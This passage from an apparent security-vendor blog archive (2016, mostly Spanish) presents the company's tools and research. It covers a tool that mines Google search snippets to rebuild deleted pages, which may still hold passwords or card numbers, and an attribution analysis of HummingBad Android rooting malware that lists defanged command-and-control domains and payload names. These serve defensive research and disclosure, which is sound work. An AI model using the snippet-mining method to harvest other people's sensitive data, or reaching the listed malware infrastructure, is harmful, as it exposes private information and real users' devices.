cabo estas acciones.
15 de septiembre de 2016
Google Index Retriever es ahora de código abierto
En marzo de 2015, se presentó Google Index Retriever. Ahora ha sido mejorado y corregido y se ofrece a la comunidad para que cualquiera lo mejore o simplemente pueda curiosear en su código. Si cualquier programador necesita una funcionalidad concreta, o se le ocurre cómo pulir algún algoritmo interno, ahora es posible desde GitHub. Esperamos que esto haga de Google Index Retriever una herramienta más eficiente, eficaz y con muchas más y mejores funcionalidades. Google Index Retriever intentará recuperar el índice de Google, para poder obtener parte del texto de la web y así el contenido eliminado que se necesita. La caché de Google no está ahí para siempre. Archive.org y su WayBackMachine no toma tantas instantáneas de las páginas menos populares, así que se dan situaciones donde lo único que queda de una página está en el índice de Google, y de ahí todavía se puede extraer información. ¿Qué es Index Retriever? El índice de Google es esa pequeña porción de texto en la página de resultados del motor de búsqueda de Google que se muestra cuando se busca cualquier texto. Es el índice, las palabras buscadas aparecen resaltadas. Google Index es la última parte de una web en desaparecer. Habrá situaciones donde será la única y última parte que queda. Google mantiene índices diferentes para la misma página así que, si se pudieran poner todos juntos, el texto podría reconstruirse y tener la mayor parte de la página eliminada. Pero no es la única situación en la que la herramienta podría ser útil. ¿Y si el índice contiene contraseñas, números de tarjeta de crédito o cualquier otra información sensible? De hecho esto fue una de las razones para crear la herramienta: demostrar que eliminar páginas con contenido sensible u ofensivo, incluso de la caché, no es suficiente. El contenido podría seguir siendo accesible. Todo esto se explica en esta presentación. ¿Cómo funciona la herramienta? Es muy sencilla. La herramienta se alimenta de una búsqueda de Google que produce un índice como resultado. Intentará realizar una especie de fuerza bruta en la búsqueda (estimulándola) para obtener de vuelta tanto texto como sea posible. Ejemplo de uso y recopilación del índice El botón "One Shot": Busca solo una vez con la información proporcionada. Se utiliza para ser lo más específico posible con la cadena de búsqueda antes de empezar con el botón de "Start". El botón "Start": Comienza buscando en modo automático. La caja de resultados mostrará el tiempo pasado desde que comenzó la búsqueda, la búsqueda que hizo aparecer la información y finalmente la frase más larga encontrada si difiere de la anterior, para que el usuario pueda reconstruir así la página. La lógica para intentar "estimular" el índice y recuperar la información es: Primero, intenta estimular el índice con las palabras que ya ha encontrado en el resultado del primer índice y se encuentran "alrededor" de la primera palabra buscada, para poder recuperar frases enteras una y otra vez. Si no hay más resultados o no quedan "palabras alrededor", la búsqueda se repite con palabras clave proporcionadas por el usuario como un "ataque por diccionario". Cuando ocurre esto, la barra de progreso cambia de color. Pestaña de spam La herramienta también puede ser usada para comprobar si una página ha sido probablemente comprometida y se le han inyectado spam como estrategia de Black SEO. Es habitual que los atacantes comprometan páginas e inyecten palabras relacionadas con el spam en ellas para "robar" su pagerank. Pestaña de Spam inyectado en una web con Google Index Retriever Este contenido no es visible por los visitantes sino por los crawlers y robots de Google, así que normalmente se verá en ese índice. Esta pestaña del programa funciona exactamente igual que la otra pero con otra lógica: Intenta buscar directamente desde un conjunto diferente de keywords (relacionados con el Spam) en el índice de Google. De esta forma, es más sencillo saber si una página ha sido comprometida y se le ha inyectado spam relacionado con el Black SEO. Otras funcionalidades Ell programa está escrito en Java para que pueda funcionar bajo cualquier sistema y versión, aunque ha sido más comprobada en Windows. Los resultados pueden ser exportados a un documento html en local. Las keywords son completamente personalizables. Pueden ser añadidas individualmente o editadas directamente desde un fichero TXT. Añadiendo keywords al diccionario para estimular el índice Esperamos que la herramienta sea útil y ahora su código, también.
14 de septiembre de 2016
ElevenPaths y la Universidad de Carlos III participarán en la prestigiosa ACM Conference on Computer and Communications Security en Viena
Una investigación promovida desde el área de innovación y laboratorio de ElevenPaths, y desarrollada en conjunto con la Universidad Carlos III de Madrid ha sido aceptada para participar en la ACM Conference on Computer and Communications Security de Viena que tendrá lugar en octubre y donde se presentarán los resultados. The ACM Conference on Computer and Communications Security (CCS) es la conferencia anual del Special Interest Group on Security, Audit and Control (SIGSAC) que pertenece a la Association for Computing Machinery (ACM). La conferencia reúne a investigadores, desarrolladores y usuarios de todo el mundo que pretenden compartir ideas y resultados innovadores. Proporciona un entorno en el que discutir y debatir la seguridad a nivel académico y siempre ha establecido un estándar muy exigente con la calidad de las investigaciones admitidas. Su edición número 23 tendrá lugar del 24 al 28 de octubre en Viena. Se trata de una de las conferencias más prestigiosas del sector académico con uno de los ratios de aceptación de investigaciones más bajo. La investigación presentada "Insights of antivirus relationships when detecting Android malware: A data analytics approach" ha sido realizada utilizando los datos de las innovadoras herramientas de seguridad aportadas por ElevenPaths (como Tacyt) y el dilatado conocimiento de la Universidad Carlos III en el manejo y procesamiento de big data y machine learning. Fruto de esta colaboración se espera no solo entender y mejorar la ciberseguridad en general sino integrar este conocimiento generado para potenciar e innovar en los productos y servicios más representativos desarrollados por ElevenPaths.
5 de septiembre de 2016
Nuevo plugin inteligente para FaasT: HPKP y HSTS
Desde nuestro laboratorio se ha creado un nuevo plugin para FaasT que comprueba de forma inteligente la tecnología HSTS y HPKP no solo evaluando la presencia de estas cabeceras, sino su correcta implementación, aportando además sugerencias sobre cómo mejorarlas. Este nuevo plugin viene a reforzar a FaasT como el escáner de pentesting persistente más avanzado e innovador. Tres años después, FaasT sigue evolucionando con más y mejores Plugins, cada vez más inteligentes y completos. Ahora FaasT evalúa de forma inteligente no solo la presencia de cabeceras HSTS y HPKP en las páginas analizadas, sino que además realiza comprobaciones que permiten conocer hasta qué punto su configuración es la adecuada y están cumpliendo su misión. HSTS El protocolo HTTP Strict Transport Security (HSTS) permite transformar las peticiones HTTP en HTTPS desde el propio navegador. Si un servidor decide enviar cabeceras HSTS a un navegador, cualquier visita posterior de ese navegador al dominio, será convertida automáticamente y de forma transparente a HTTPS desde el propio navegador, evitando así peticiones inseguras desde el mismo punto de partida de la conexión. La aplicación del protocolo HSTS es transparente al usuario, es decir, los navegadores son los encargados de recordar los dominios que le han indicado por HSTS durante cuánto tiempo deben ser visitados por HTTPS y gestionan el cambio sin que el usuario deba preocuparse de nada. En el caso de Firefox, es posible utilizar nuestro addon PinPatrol para comprobar tanto la información HSTS como HPKP. El dominio transmite la información de HSTS al navegador a través de la cabecera Strict-Transport-Security. En esta cabecera se facilitan tres campos más: max-age, includeSubdomains y preload (opcional). Un ejemplo de cómo se muestra información sobre HSTS en el panel de FaasT Pero no solo la presencia o ausencia de esta cabecera es determinante. La correcta configuración y combinación de sus diferentes campos, además de bajo qué circunstancias y dominios se emiten, determinan la seguridad total del conjunto. El plugin de FaasT tiene en cuenta recomendaciones presentes en el RFC definido, además de otras propias basadas en descubrimientos de nuestro propio laboratorio, y que constituyen errores típicos que merman la seguridad proporcionada teóricamente por la cabecera. HPKP La idea detrás del certificate pinning reside en poder detectar cuándo una cadena de confianza ha sido modificada. Para ello se busca asociar (habitualmente, en el navegador) inequívocamente un certificado digital a un dominio concreto (se recuerda certificados presentes en una cadena de certificación y se avisa ante cualquier alteración). El pinning se puede realizar desde el lado del cliente o servidor o con la colaboración de ambos, como es el caso de la solución HPKP. Este protocolo HTTP Public Key Pinning (HPKP) define una nueva cabecera HTTP (Public-Key-Pins) en la que el dominio envía información al navegador sobre sus certificados y política de pinning. Un ejemplo de esta cabecera podría ser: Public-Key-Pins: pin-sha256="d+Nzzj/kBbW36XgzHd3iQz7lzmMFM7UedINRmVf+ie4="; pin-sha256="U7ZybtJ2wCBeg7QSvWZppKSa06gOYkSCIZkaR2ft3DM="; pin-sha256="JNFyeZHEFDpGO41RvpVRuQY1Oi19xtLFeF99j0EYduE="; max-age=15768000; includeSubDomains En esta cabecera se facilitan distintas directivas: pin-sha256, max-age., includeSubdomains y report-uri (opcional). Igualmente, el correcto uso de estas cabeceras determinará la seguridad de la implementación: Los pines proporcionados deben ser los correctos representando la cadena de certificación la entidad adecuada con la criptografía más robusta. Además, el pin de respaldo debe estar presente y a ser posible no encontrarse firmado … estas son algunas de las recomendaciones evaluadas por el plugin de FaasT. Un ejemplo de cómo se muestra información sobre HPKP en el panel de FaasT Conclusiones No solo la evaluación debe ser persistente sino también inteligente. La mera presencia de cabeceras web, por ejemplo, no garantiza la seguridad. Es necesario evaluarlas y comprobar que cumplen su misión. El plugin de HSTS y HPKP para FaasT (en constante evolución) no solo recordará a los administradores que es necesaria su implementaición, sino que recomendará la mejor manera de hacerlo.
22 de agosto de 2016
![[Nuevo informe] eMule: ¿siempre una fuente de archivos maliciosos?](https://media.telefonicatech.com/telefonicatech/uploads/2021/1/6123_emule.jpg)
[Nuevo informe] eMule: ¿siempre una fuente de archivos maliciosos?
No es necesaria ninguna prueba de concepto que evidencie la existencia de malware en redes P2P. Es un hecho demostrable con cualquier búsqueda en un cliente del tipo eMule, que bajo cracks, serials, ejecutables y todo tipo de reclamos, se esconde software malicioso. Pero en ElevenPaths nos hemos preguntado si ocurre lo mismo en el caso de los documentos ofimáticos, libros, o diapositivas. ¿Es peligroso abrir un Excel, PowerPoint, archivo Word o PDF descargado de eMule? El experimento En este experimento nos centramos en el análisis de archivos ofimáticos y PDF, realizando un repaso previo por las técnicas más conocidas de infección. Para llevarlo a cabo, hemos descargado 7973 muestras de archivos ofimáticos y PDF usando los servidores de conexión que proporciona el cliente eMule. Esto significa que no hemos tenido en cuenta servidores adicionales, sino los supuestamente fiables que recomienda eMule y de los que disponen por defecto la mayoría de los usuarios cuando instalan este cliente en Windows. Hemos prestado especial atención al formato de los documentos descargados, y en especial hemos atendido a las macros y JavaScript incrustados en ficheros ofimáticos y PDF respectivamente, principal fórmula de infección a través de este tipo de archivos. Archivos con macros (en el caso de ofimáticos) o JavaScript (en el caso de PDF) descargados de redes P2P Se han utilizado varios métodos además de los antivirus para poder determinar si alguno de esos casi 8000 archivos podían resultar peligrosos: Extracción de potencial payload (macros o JavaScript) Búsqueda de URLs y direcciones IP maliciosas en el interior del documento. Análisis en profundidad de los formatos potencialmente corruptos. Tras el análisis, lo cierto es que no fuimos capaces de encontrar ni una sola muestra con malware, payload o exploit funcional conocido, al margen de algunos falsos positivos demostrados. El hallazgo es, cuando menos, curioso. Sin malware en el frente Las conclusiones por tanto podrían ser: No parece habitual encontrar malware conocido en documentos ofimáticos y PDF en redes eDonkey. Este tipo de ataque parece restringirse a la difusión por correo electrónico, donde siempre se han encontrado una gran cantidad de muestras. No parece que los documentos ofimáticos compartidos en redes P2P utilicen las tácticas más habituales de ejecución de malware, tales como el uso de exploits, macros maliciosas, o métodos de ingeniería social. Dentro de los no detectados como malware conocido, el porcentaje de ficheros más sospechosos (que ofrezcan las condiciones necesarias en muchas ocasiones para ser dañinos como presencia de macros o JavaScript…) no es muy elevado. Un 8,5% en el caso de documentos ofimáticos contienen macros, y solo un 1,5% de los PDF contienen JavaScript. A pesar de estos hallazgos, no es recomendable ni seguro descargar archivos de fuentes no confiables. Ni ofimáticos ni de ningún tipo. Los detalles y análisis en profundidad con detalles está disponible desde: eMule: ¿siempre una fuente de archivos maliciosos? from ElevenPaths
1 de agosto de 2016
El informe Chilcot y los metadatos de la guerra
John Chilcot presidente de la Comisión Independiente para investigar la participación de UK en la guerra de Iraq, presentaba hace unos días el informe con el conjunto de conclusiones a las que se ha llegado tras una investigación que ha durado 7 años. En este informe se pone de manifiesto que Tony Blair ex-primer ministro británico (1997-2007) no tomó las medidas necesarias para agotar las posibilidades no bélicas antes de iniciar la invasión junto a Estados Unidos de un país soberano como era Iraq en el año 2003. Esta noticia nos hace retomar el DeLorean a los tiempos en los que el dictador Sadam Hussein gobernaba Iraq con puño de hierro, un país que se había estado reponiendo de sus pérdidas en la guerra de Kuwait unos años antes, donde a pesar de la derrota, el régimen de Sadam permaneció en el poder. Los acontecimientos del 11s en 2001, el rearme militar, el petróleo y las tensiones religiosas formaron un caldo de cultivo propicio para que los servicios de inteligencia norteamericanos extendieran sus tentáculos en busca de razones para planificar un derrocamiento del líder iraquí. Esto no se consiguió a pesar de los esfuerzos y el apoyo de facciones religiosas contrarias al régimen así que hubo que inventarse algo que diera los motivos necesarios ante los ojos de las Naciones Unidas de que la invasión del país era necesaria. Tony Blair presentó en la Cámara del Gobierno británico un informe de inteligencia proporcionado por los servicios secretos norteamericanos que afirmaba la existencia de estas armas en suelo iraquí listas para ser utilizadas contra objetivos civiles o militares. Ante la pregunta de si el informe digital era legítimo, Tony Blair defendió su integridad y su total confianza. Curiosamente este hecho supondría un punto de inflexión en el mundo de la seguridad digital. El plan fructificó y se hizo creer al mundo que Sadam Hussein poseía en su arsenal armas de destrucción masiva, una gran amenaza que no se podía permitir y más en manos de un dictador que expresaba públicamente su odio al mundo occidental y a Israel. Este informe fue hecho público para que el mundo pudiese ver que efectivamente existían razones justificadas para la guerra, pero lo que no se sabía es que el informe contenía oculto entre sus metadatos detalles que pondrían en duda las palabras del Primer Ministro y la veracidad del informe. Entre los metadatos aparecieron entre otras cosas una serie de nombres que de una u otra manera intervinieron en el informe antes de su presentación, todos pertenecientes al entorno de Tony Blair, lo cual hizo sospechar de su intencionada manipulación. Pero aquí no acaba todo, como detalle, la última persona en manipular el documento fue un becario, algo que no encajaba en la imagen seria de los servicios secretos al estilo de James Bond que siempre nos han querido mostrar. Para echarse a llorar. Este hecho salió a la luz gracias al descubrimiento del Dr Glen Rangwala profesor en ciencias Políticas en Cambridge el cual fue hecho público bajo el titulo Tony Blair in the Butt que a día de hoy aún se deja encontrar por la web y donde aparecen las personas que de una u otra manera gestionaron el informe. Encontrar hoy en día el documento Word que destapo el escandalo se ha vuelto complicado lo cual nos obliga a tirar de repositorios que aún mantienen el documento con los metadatos del momento. En aquellos tiempos no existían las herramientas que hoy en día nos permiten la gestión o visualización de los metadatos y esto le habría evitado al señor Blair verse involucrado en el escándalo que esto supuso y puede que sus posteriores consecuencias plasmadas en el informe Chilcot. La reputación es algo que cuesta mucho en conseguir y poco en destruir. Esto lo sabe bien el Sr. Blair. Un hecho que forma parte de los claros ejemplos de la historia de los metadatos y el inicio de la carrera por controlarlos, procesarlos o eliminarlos que se aceleró en los años posteriores y que a día de hoy se ha convertido en uno de los grandes retos de la seguridad digital en todo el mundo. ¿Quieres prevenir y detectar a tiempo una fuga de información? En ElevenPaths ofrecemos soluciones preventivas contra la fuga de información a través de la familia Metashield. Si quieres saber más sobre el tratamiento de metadatos, habla con nuestros expertos en Ciberseguridad en la Comunidad Técnica de ElevenPaths. Antonio Bordón Villar antonio.bordon@11paths.com
15 de julio de 2016
SandaS: Respuesta inmediata a los ciberataques
Hoy en día existen en el mercado proveedores que ofrecen diferentes soluciones de seguridad para organizaciones con presencia en Internet. En los últimos tiempos, uno de los aspectos más importantes y que más preocupa a los CIO/CISO de las compañías es el tiempo transcurrido desde que un incidente de seguridad se produce en su organización y cuándo la organización es consciente del mismo. Otro punto importante a destacar es el tiempo de reacción que cuentan las organizaciones para mitigar el ataque producido. En grandes corporaciones, un ataque que produzca un impacto importante y que no se resuelva a tiempo, puede suponer perdidas millonarias para el negocio y posiblemente la quiebra. Con el fin de ofrecer una respuesta inmediata a los ciberataques actuales, SandaS permite orquestar todos los procesos que intervienen desde la detección del ataque hasta la mitigación del mismo, estando informada la organización en todo momento. SandaS y su modularidad SandaS aporta inteligencia sobre el ecosistema de correlación tradicional existente hoy en día, proporcionando información y visibilidad de los ataques producidos sobre los activos de las organizaciones en tiempo real. Se integra con los principales fabricantes de soluciones de seguridad, como son AlienVault, RSA Security Analytics, HP ArcSight y McAfee Nitro. Posee una infraestructura distribuida y modular que se adapta a las necesidades específicas de las organizaciones Por un lado es un correlador avanzado (CA) que permite complementar al correlador nativo de los SIEM de las organizaciones agregando una capa de inteligencia adicional y por otro lado realizando el envío de las alertas junto con sus eventos para su posterior categorización. Posee un sistema colaborativo (SC) que permite compartir las alertas a un sistema central donde se anonimizan y sirven para que otros clientes puedan aprovechar el conocimiento de ataques comunes provenientes de Internet para así aplicar las contramedidas necesarias y reducir el tiempo de exposición a la posible amenaza. Categoriza cada alerta y procesa en tiempo real acciones predefinidas, como pudiera ser la notificación a un grupo de operación o aplicar una mitigación en un dispositivo de seguridad. Todos estos procesos son recogidos y visualizados en una consola única de gestión, permitiendo tener una visibilidad global de lo que está ocurriendo en tiempo real en las organizaciones. SandaS y su modularidad Los motores de correlación de las herramientas SIEM actuales tienen una serie de carencias: - Dependencias de eventos - Revisión de correlaciones tras actualización sondas de IDS/IPS/Antivirus: Correlaciones ya creadas Creación de nuevas correlaciones - Dependencia de tecnologías - Nuevos tipos de dispositivos requieren configurar nuevas correlaciones específicas ya que los eventos cambian: Uso de taxonomía no muy extendida aún Taxonomía no incluida en fuentes de logs propietarias - Reducida flexibilidad - Utilización de distintos algoritmos para la detección: Normalmente solo secuencia de eventos - Fijación de umbrales - Correlaciones fijas y poco flexibles, que no tienen en cuenta información del entorno. El módulo SandaS CA es el encargado de realizar la correlación avanzada y el envío de alertas de seguridad con sus eventos asociados. Dicho módulo tiene una estrecha relación con el correlador desplegado en la infraestructura de cliente, ya que complementa al motor de correlación tradicional del dispositivo SIEM. La Correlación Avanzada consta de 4 tipos diferentes de correlación: Redes neuronales Árboles de decisión Eventos periódicos Anomalías estadísticas SandaS CA realiza un análisis detallado de los eventos registrados en la base de datos del correlador. Una vez aplicada la inteligencia basada en los correladores mencionados anteriormente, inyecta nuevos eventos en la base de datos del correlador. Además, de forma periódica envía al módulo SandaS RA las alertas generadas en el correlador y los eventos asociados a las mismas. SandaS RA Realiza la categorización de las alertas recibidas y aplica acciones según las necesidades de cada cliente. Está integrado con soluciones comerciales de monitorización de salud de activos como OPSView, permitiendo la centralización de eventos de salud y eventos de seguridad en un solo sistema. Por otra parte, permite la integración con sistemas de ticketing como Remedy, realizando la apertura, consulta y cierre automático de tickets en el sistema sin ningún tipo de interacción humana. SANDAS DASHBOARD Portal donde se muestra de manera gráfica y en detalle todos aquellos incidentes de seguridad y salud (en caso de estar integrado con un sistema de monitorización de salud) generados por los activos de cliente, pudiendo realizar diferentes filtros por localización, prioridad, servicio, etc. Caso de uso Cada día se producen múltiples ciberataques a las organizaciones con presencia en Internet, muchos de éstos pasan totalmente inadvertidos y el impacto en un activo en ocasiones llega a ser muy importante. Por ejemplo, un acceso ssh remoto desde Internet configurado por la organización para que una empresa externa contratada pueda desarrollar una determinada aplicación interna, podría provocar un incidente de seguridad grave si se produjera un ataque y éste no fuera detectado a tiempo por la organización. Gracias a la capacidad de integración con los fabricantes de seguridad más importantes del mercado, SandaS orquesta de forma eficaz y eficiente, por un lado la notificación del ataque producido y por otro lado la remediación automática contra dicho ataque, de tal forma que la organización esté totalmente informada del suceso y al mismo tiempo protegida, ejecutándose unas contramedidas específicas automáticamente y reduciendo el tiempo de respuesta producido desde que se detecta el ataque hasta que se aplica la contramedida efectiva para paliarlo. En el caso de uso que nos ocupa, intervienen 2 fabricantes de seguridad integrados actualmente con SandaS: Security Analytics de RSA como correlador de eventos de seguridad y Palo Alto como dispositivo de seguridad perimetral. Security Analytics La correlación es una pieza clave de la seguridad de toda organización, ya que es capaz de generar alertas a partir de eventos generados de diferentes dispositivos. Security Analytics permite la creación de reglas específicas para identificar posibles ataques. En nuestro caso hemos creado una regla que identifique como ataque más de tres intentos fallidos de inicio de sesión ssh dentro de un período de cinco minutos. Si en el proceso de correlación de los eventos recibidos coincide con la regla creada anteriormente, una alerta es generada y enviada a través del módulo SandaS CA a SandaS RA para su categorización, notificación y remediación. Notificación Una vez categorizado el incidente, SandaS RA lanza el proceso de notificación y mitigación en paralelo. Existen diferentes modos de notificación. En este caso se realiza mediante correo electrónico al buzón de operación de la organización. Palo Alto Una vez categorizada la alerta por SandaS RA, se procesa una acción de mitigación del ataque en el firewall de nueva generación de Palo Alto. Éste contiene una política que permite realizar sesiones SSH contra el servidor SSH, pero que deniega/corta una sesión SSH para cualquier ip contenida en un grupo dinámico con etiquetas definidas dentro de él. Al generarse la alerta desde Security Analytics y enviada a SandaS RA, éste obtiene la ip de origen del atacante desde la alerta recibida, lo etiqueta y lo inyecta automáticamente a Palo Alto junto con la acción de ser incluida dentro del grupo dinámico existente en la política. Finalmente el incidente es mostrado en SandaS Dashboard. En él se puede ver la severidad del incidente, la fecha y hora de cuando se ha producido, una breve descripción, el servicio al que afecta, la ip de origen del ataque, la localización, etc. Si estuviera integrada con la herramienta de ticketing indicaría además el número de ticket generado y asociado al incidente y el estado del mismo (en proceso, resuelto, etc). Más información en: elevenpaths.com
11 de julio de 2016
Another month, another new rooting malware family for Android
Several months ago there was a media explosion about Android-rooting malware on Google Play. Those families were discovered by Cheetah Mobile Security Research Lab, Check Point, Lookout, FireEye, and Trend Micro and variously named NGE MOBI/Xinyinhe, Brain Test, Ghost Push, Shedun or Kemoge. In a previous report, we tried to connect the dots and concluded that there was a good chance each malware was developed by the same group which evolved its techniques dating back to 2014. Now, it’s happening again: There are numerous reports in the media about HummingBad, Hummer, and Shedun Reloaded. Do them belong to the same malware family? It all depends which lab is doing the analysis. Three different families or not? HummingBad In February, Check Point alerted the market about HummingBad. It followed the same "rules" established by the Brain Test family, which means it introduces a rootkit on the phone, is almost impossible to remove, and installs fraudulent apps automatically. But it was stunningly more sophisticated. It was installed by drive-by-downloads, its content was encrypted, and it used several redundancy methods to ensure infection (including automatic and, if not possible, social engineering). Some of the infrastructure used as a C&C was hxxp://manage.hummerlauncher.com domain, hxxp://cdn.sh-jxzx.com/z/u/apk, hxxp://fget.guangbom.com and hxxp://d2b7xycc4g1w1e.cloudfront.net. And it gets worse. In early July, Check Point researchers attributed HummingBad to a "legitimate" advertising company called Yingmob, responsible as well for the iOS malware called Yispecter that took advantage of its enterprise certificate to install itself and was discovered in late 2015. Hummer Also in July, Cheetah Mobile wrote about a malware it called Hummer, a new threat different from GhostPush (its own name for Shedun, Kemoge, BrainTest, etc). Although Cheetah Mobile does not explicitly says so, Hummer is HummingBad, as we can easily confirm with Tacyt because, for example, it uses the same infrastructure and rooting file called right_core.apk, which is sometimes embedded and sometimes downloaded. A HummingBad/Hummer sample with some of the singular URLs used Shedun? Lookout thinks differently. They claim HummingBad, or Hummer, is the same as Shedun, discovered in November 2015. It maintains Shedun is closely related to the BrainTest/GhostPush family, but it only describes the HummingBad malware as "not new" without any further technical details. So, is this HummingBad/Shedun an evolution from the same cybercriminal group we connected in our previous report, or does it come from a different group? Let’s take a look. Our analysis HummingBad, or Hummer, comes from a "legitimate" adware company called Yingmob which, for a while, had its "Hummer Launcher" app on Google Play. Google eventually removed the app in May 2015. Hummer Launcher signed with the same certificate as some HummingBad samples As we determined using Tacyt, even the aggressive payloads are signed with the same certificate. From our previous report in October, we saw some very specific behaviors that associated all the malware families. For example, the use of a few particular domains and the presence of some files inside the APK like "sys_channel.ng". One of the particular domains shared by several samples analyzed in October One of the particular file names shared by several samples analyzed in October Our analyst team used Tacyt to conclude that there is strong evidence suggesting a relationship between several different reports from different security companies, and confirmed that some of the aggressive apps discovered were on Google Play in early 2015. The evidences suggested that these supposed different families of malware, may be just the same Chinese cybercriminals (because of using the infrastructure, domains, topics, files, etc.) evolving the same idea about serving aggressive ads, rooting the devices, sending commands and installing new packages. We came to this conclusion because of several similarities that relate the families: domains, dates, permissions, names, certificates, resources, etc. The Chinese group started their activities maybe in late 2014, using the OPDA "brand" and trying to introduce malware on Google Play as well as legitimate apps. Later, they evolved new techniques, from Xinyinhe adware, which seems to be just a variant of Ghost Push, Brain Test to Kemoge, all technically related in some way. What about HummingBad? Checking HummingBad’s singularities we determined that it uses a completely different infrastructure with little in common with our previous findings, even though it follows the same philosophy of rooting the device and silently installing apps. We can find no evidence about certificates, files, or any other hint that helped us to tie both families together as we did before. Of course, we may have not found them. For example, HummingBad uses mainly these domains: guangbom.com, hummerlauncher.com, hmapi.com, cscs100.com… They are not shared with previous Chinese families, except hmapi.com, which seems common place for adware and malware. All apps containing this particular domain on Google Play are eventually removed hmapi.com shared between several different aggresive adware or malware samples eventually removed As another example, HummingBad uses right_core.apk as a payload, which is either downloaded or embedded. Searching for samples using a specific file downloaded or embedded With HummingBad we can only go back to early 2015 with "legitimate" adware samples. With the BrainTest family we can go back to 2014. Signing date for all the samples we have labeled by our analysts as HummingBad Another point of interest is that it appears that Brain Test was not very interested in tracking their ads with UMENG (the popular Chinese platform), while HummingBad seems to use UMENG in many more samples. The keys do not match in any case. Comparing keys between families Philosophy matches but the code, infrastructure, and "history" do not Shedun and HummingBad seem to operate from the roots of "legitimate" Chinese companies (OPDA and Yingmob), and they may be related in other ways, but the owners, resources and developers appear different. So we can conclude a couple of insights: HummingBad is Hummer, but it does not seem to be Shedun/GhostPush/Brain Test itself. This is important, because it would mean cybercriminals are learning from each other. It is not just the same group evolving its own product. That is a scary since they will most likely improve technically to gain market share when they have "competitors". Attribution is always a risky exercise for every researcher (including us), but we believe HummingBad is not an evolution but is instead another new, dangerous rooting malware that was developed alongside previous malwares (just as there are different ransomware or banking Trojan families with the exact same philosophy). And we also think this malware it here to claim its market share and stay for a while.
11 de julio de 2016
Otro mes, otra nueva familia de "rooting malware" para Android
Hace varios meses hubo una explosión mediática sobre malware de rooteo de Android en Google Play. Estas familias fueron descubiertas y descritas por los laboratorios de investigación y seguridad de Cheetah Mobile, Check Point, Lookout, FireEye y Trend Micro, que las denominaron NGE MOBI/Xinyinhe, Brain Test, Ghost Push, Shedun o Kemoge. En un informe técnico posterior, tratamos a su vez de unir los puntos y conectarlas a todas. Concluimos que probablemente, todas ellas habían sido desarrolladas por el mismo grupo que habrían ido evolucionado sus técnicas desde, quizás, 2014. Vuelve a ocurrir: Se ha escrito en los medios sobre HummingBad, Hummer o Shedun Reloaded. ¿Pertenecen a la misma familia de malware? Todo depende de qué laboratorio este haciendo el análisis. ¿Tres familias diferentes de malware o no? HummingBad En febrero de este año, Check Point alertó al mercado sobre HummingBad. Este malware sigue las mismas "reglas" establecidas por la familia Brain Test, lo que implica que introduce también un rootkit en el móvil casi imposible de quitar, e instala aplicaciones móviles fraudulentas automáticamente. Pero era sorprendentemente más sofisticado. Infectaba a través de drive-by-downloads, su contenido estaba cifrado, y utilizaba varios métodos de redundancia para asegurar la infección (incluyendo automatización y, si esto no funcionaba, ingeniería social). Parte de la infraestructura utilizada como C&C han sido los dominios hxxp://manage.hummerlauncher.com, hxxp://cdn.sh-jxzx.com/z/u/apk, hxxp://fget.guangbom.com y hxxp://d2b7xycc4g1w1e.cloudfront.net. Y empeora. A principios de julio, los investigadores de Check Point atribuyeron HummingBad a una compañía de publicidad "legítima" llamada Yingmob, que según mantienen, es además responsable del malware para iOS denominado Yispecter, que se aprovecha de su certificado corporativo para instalarse por sí mismo, y que fue descubierto a finales del 2015. Hummer También en julio, Cheetah Mobile alertó sobre un malware que llamó Hummer, una nueva amenaza diferente a "GhostPush" (su propia denominación para Shedun, Kemoge, Brain Test, etc). Aunque Cheetah Mobile no lo indica explícitamente, Hummer es HummingBad, tal y como hemos podido confirmar fácilmente con Tacyt, puesto que utiliza la misma infraestructura y el archivo de rooting "right_core.apk" que a veces va incrustado en el APK y otras veces es descargado. Un ejemplar de HummingBad/Hummer con algunas de las URL singulares utilizadas Shedun? Lookout piensa de forma diferente. Afirman que H ummingBad, o Hummer es lo mismo que Shedun, descubierto en noviembre de 2015. Mantienen que Shedun está estrechamente relacionado con la familia de BrainTest/GhostPush, y describen HummingBad como "no nuevo", sin aportar más detalles técnicos. Por tanto, ¿son HummingBad/Shedun una evolución del mismo grupo cibercriminal que llegamos a conectar en nuestra anterior investigación, o proviene de un grupo distinto? Vamos a verlo. Nuestro análisis HummingBad, o Hummer, provienen de una compañia de adware "legítima" llamada Yingmob que por un tiempo, mantuvo su popular aplicación móvil "Hummer Launcher" en Google Play. Finalmente, Google eliminó la aplicación en mayo de 2015. Hummer Launcher firmado con el ismo certificado igual que algunas muestras de HummingBad Determinamos usando Tacyt, que incluso algunas muestras más agresivas estaban firmadas con el mismo certificado. Desde nuestro informe anterior de octubre, vimos algunas conductas muy específicas que asocian todas las familias de malware. Por ejemplo, la utilización de unos dominios particulares y la presencia de algunos archivos dentro del APK como "sys_channel.ng". Uno de los dominios particulares compartido por varias muestras analizadas en octubre Uno de los nombres de ficheros específicos compartido por varias muestras analizadas en octubre Nuestro equipo de analistas utilizó Tacyt para concluir que existe una fuerte evidencia que sugiere una relación entre varios informes diferentes de varias diferentes empresas de seguridad, y confirmar que algunas de las aplicaciones móviles agresivas descubiertas estaban en Google Play a principios del 2015. Las evidencias obtenidas sugieren que las supuestas diferentes familias de malware podrían proceder de los mismos cibercriminales chinos (utilizan la misma infraestructura, los mismos dominios, asuntos, archivos, etc), evolucionando la misma idea de servir anuncios agresivos, rotear los dispositivos, enviar comandos e instalar nuevos paquetes. Llegamos a esta conclusión por varias similitudes que relacionan a las familias: dominios, fechas, permisos, nombres, certificados, recursos, etc. Este grupo chino comenzó sus actividades probablemente a finales de 2014, utilizando la "marca" OPDA y tratando de introducir malware en Google Play así como aplicaciones legítimas. Posteriormente, evolucionaron con nuevas técnicas, desde el adware Xinyinhe, que parecen ser simplemente variantes de "Ghost Push", "BrainTest"... hasta "Kemoge", todos ellos técnicamente relacionados de alguna forma. ¿Y qué pasa con HummingBad? Comprobando las singularidades de HummingBad hemos determinado que utiliza una infraestructura completamente diferente que tiene poco en común con nuestros resultados anteriores, aun cuando siguen la misma filosofía de rootear el dispositivo e instalar de forma silenciosa aplicaciones. No podemos encontrar ninguna evidencia acerca de certificados, archivos, o cualquier otro indicio que pueda ayudarnos a vincular las dos familias juntas como lo hicimos previamente. Por supuesto, es posible que no las hayamos encontrado. Por ejemplo, HummingBad utiliza principalmente estos dominios: guangbom.com, hummerlauncher.com, hmapi.com, cscs100.com… que no son compartidos con familias de malware anteriores, excepto hmapi.com, que parece un lugar común para adware y malware. Todas las aplicaciones móviles que contienen este dominio particular en Google Play son finalmente eliminadas. hmapi.com compartido entre adware o malware diferente que finalmente es siempre eliminado Otro ejemplo puede ser que HummingBad utiliza right_core.apk 